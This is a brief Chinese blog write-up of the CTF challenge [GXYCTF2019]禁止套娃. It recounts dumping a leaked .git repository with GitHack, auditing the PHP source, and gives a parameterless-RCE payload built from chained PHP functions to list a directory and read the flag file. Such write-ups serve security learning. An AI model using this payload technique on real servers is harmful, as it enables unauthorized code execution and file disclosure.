[GXYCTF2019]禁止套娃 1

1.发现

1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。

 

 2.步骤

2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

 

 

 3.借鉴

(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客

 4.知识点

.git源码泄露

无参RCE

posted @ 2021-10-31 08:31  WeQi_Blog  阅读(194)  评论(0)    收藏  举报